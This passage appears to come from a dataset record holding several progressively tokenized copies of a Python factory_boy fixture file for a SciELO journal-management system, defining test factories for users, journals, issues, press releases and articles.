factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n_HERE = os.path.dirname(os.path.abspath(__file__))\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')\n ) as xml_file:\n SAMPLE_XML = xml_file.read()\nSAMPLE_TIFF_IMAGE = open(os.path.join(_HERE, 'image_test',\n 'sample_tif_image.tif'))\nwith open(os.path.join(_HERE, 'xml_samples',\n '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:\n SAMPLE_XML_RELATED = xml_file.read()\n\n\nclass UserFactory(factory.Factory):\n FACTORY_FOR = models.User\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list('id', flat=True\n ).order_by('-id')[0] + 1\n except IndexError:\n return 0\n username = factory.Sequence(lambda n: 'jmanager_username%s' % n)\n first_name = factory.Sequence(lambda n: 'jmanager_first_name%s' % n)\n last_name = factory.Sequence(lambda n: 'jmanager_last_name%s' % n)\n email = factory.Sequence(lambda n: 'jmanager_email%[email protected]' % n)\n password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'\n is_staff = False\n is_active = True\n is_superuser = False\n last_login = datetime.datetime(2000, 1, 1)\n date_joined = datetime.datetime(1999, 1, 1)\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')\n ) as xml_file:\n SAMPLE_XML = xml_file.read()\n<assignment token>\nwith open(os.path.join(_HERE, 'xml_samples',\n '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:\n SAMPLE_XML_RELATED = xml_file.read()\n\n\nclass UserFactory(factory.Factory):\n FACTORY_FOR = models.User\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list('id', flat=True\n ).order_by('-id')[0] + 1\n except IndexError:\n return 0\n username = factory.Sequence(lambda n: 'jmanager_username%s' % n)\n first_name = factory.Sequence(lambda n: 'jmanager_first_name%s' % n)\n last_name = factory.Sequence(lambda n: 'jmanager_last_name%s' % n)\n email = factory.Sequence(lambda n: 'jmanager_email%[email protected]' % n)\n password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'\n is_staff = False\n is_active = True\n is_superuser = False\n last_login = datetime.datetime(2000, 1, 1)\n date_joined = datetime.datetime(1999, 1, 1)\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n\n\nclass UserFactory(factory.Factory):\n FACTORY_FOR = models.User\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list('id', flat=True\n ).order_by('-id')[0] + 1\n except IndexError:\n return 0\n username = factory.Sequence(lambda n: 'jmanager_username%s' % n)\n first_name = factory.Sequence(lambda n: 'jmanager_first_name%s' % n)\n last_name = factory.Sequence(lambda n: 'jmanager_last_name%s' % n)\n email = factory.Sequence(lambda n: 'jmanager_email%[email protected]' % n)\n password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'\n is_staff = False\n is_active = True\n is_superuser = False\n last_login = datetime.datetime(2000, 1, 1)\n date_joined = datetime.datetime(1999, 1, 1)\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n\n\nclass UserFactory(factory.Factory):\n <assignment token>\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list('id', flat=True\n ).order_by('-id')[0] + 1\n except IndexError:\n return 0\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 